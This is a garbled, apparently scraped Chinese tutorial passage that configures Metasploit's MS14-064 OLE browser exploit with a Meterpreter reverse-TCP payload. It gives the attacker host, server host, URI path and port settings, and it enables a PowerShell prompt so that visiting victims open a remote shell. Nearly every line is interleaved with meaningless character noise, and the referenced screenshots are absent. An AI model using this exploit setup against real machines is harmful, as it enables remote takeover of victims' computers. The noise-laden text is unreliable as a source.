: |! \4 f9 l9 z" V+ R/ X. z* A 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
/ C. G) f& [: q t! P, }
7 L& |; }# {$ L8 |6 L3 U' w3 w' \/ Q4 r q7 c
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
- S, `2 q7 a) G8 ]
5 l' ~* v- a5 ~% W) e* t1 D& m. T' I+ C* o4 ~! w" ^0 f
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
' J: b5 j; D4 D7 U* |7 S! p$ q
$ Y) N. k6 p- B+ W) l+ V& e9 i$ [# Z
' f5 b0 D* W7 X5 D K7 {
set AllowPowershellPrompt true4 a/ J, V& m, l0 T# p# o
4 L2 N0 J: x5 A5 D
: \- K2 t# d( E9 `4 b! j( U Set LHOST 192.168.0.109* @( X# ]) I) t' W- I: `
2 Y% b" Z. U7 C9 A& \
; Q$ o! W7 V5 X/ t% O set SRVHOST 192.168.0.109; }7 ]. n7 _; \/ i) z
7 a! Z2 ^: z% h; y; X" |- W
, B3 l. J5 U4 V* |4 v' v: t
Set uripath share
5 \, ]# U$ {, d# \# T/ p' I
, ~! @/ L& U$ k& k
' r- ]* d( k. I* S6 M$ @ Set srvport 80
# l' F, T+ Y8 o$ D' P
* v, o, G$ `% m! G5 n2 C A: ]# |
/ b" ^) S _! `) ]7 i# M4 p
, O- H- Q/ x: @( ]1 U% J. E
1 t5 ]9 M1 V" F; a. Q {0 `! _8 @
! O7 m' l) z" G1 R' H: Z
* a7 W, v( K: r+ I
/ m) D1 x2 o% m' j8 l
7 W4 X& P! z0 r5 }; G# v, W; L4 g 4 {5 B* G- L& E3 B/ \% w
+ a* x2 @' M1 z4 s/ s' W# [
7 N: X, ^& F/ o/ E* w. w $ N8 R/ D7 h- @9 d8 v1 {
6 Y$ ~8 Z- |9 C, c0 m T
4 |% U6 `6 G' u
2 x5 `& d8 N% @3 K3 L
& @' H* v) H. _: m2 U+ A& Y# g, z
下面我们来访问本地地址如图:* e1 Y [1 f6 K8 p7 K* s d* T- O
7 L; j& J. W$ x5 q" a9 C' }
1 G, r: L) p6 [' W' h 8 h `# g' X4 y; C
5 a: W- E" ?; f
, X5 j* ]4 c& l4 v, Q) I$ K5 I. |1 r( c
: N7 d" c- U; E+ V
8 f8 y0 [0 f: ^: l- J
' ]0 k0 o$ k: U5 M& Y( L4 g9 N
3 t9 o: k9 x% a